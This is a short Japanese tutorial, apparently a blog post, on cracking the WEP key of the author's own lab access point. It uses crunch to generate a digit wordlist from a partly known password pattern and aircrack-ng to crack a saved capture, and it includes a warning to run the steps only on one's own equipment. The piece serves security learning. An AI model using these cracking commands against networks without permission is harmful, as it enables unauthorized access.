はじめに
前回では、WEPのアクセスポイントtestのパスワードが55555であることがわかりました。
これを、攻撃車がパスワードの一部をわかっているものとして、もう一度解析してみようと思います。
条件は、
パスワードが、
- 数字のみで構成されている
- はじめの数字は5
- 桁数は5桁
これらを攻撃者が既知であるとします。
注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。
辞書ファイル作成
こうしたケースの攻撃では、辞書攻撃が利用されるので、解析用の辞書をつくる。
crunch
コマンドで解析用の辞書ファイルを作成します。ファイルは、前述の3条件に基づいて作成します。
crunch 5 5 -t 5%%%% 1234567890 -o
//または
crunch 5 5 -t 5%%%% -f /usr/share/crunch/charset.lst numeric
ファイルの出力は、-oオプションか出力をリダイレクトすることで行う。
crunch 5 5 -t 5%%%% -f /usr/share/crunch/charset.lst numeric -o wep_wordlist.txt
//または
crunch 5 5 -t 5%%%% -f /usr/share/crunch/charset.lst numeric > wep_wordlist.txt
aircrack-ngでのWEPのパスワード解析
解析するキャプチャファイルは、前回と同じもの。
aircrack-ng -w wep_wordlist.txt cracking_wep_test-01.cap -e test
crunchでの辞書作成とWEPのパスワード解析を同時に行う
crunch 5 5 -t 5%%%% 1234567890 | aircrack-ng -w - cracking_wep_test-01.cap -e test
おわりに
参考にしたもの
「ハッキング・ラボのつくりかた」
「HackerJapan2013年5月号 記事:28号のツール厨房第1回パスワード辞書作成ツールcrunch」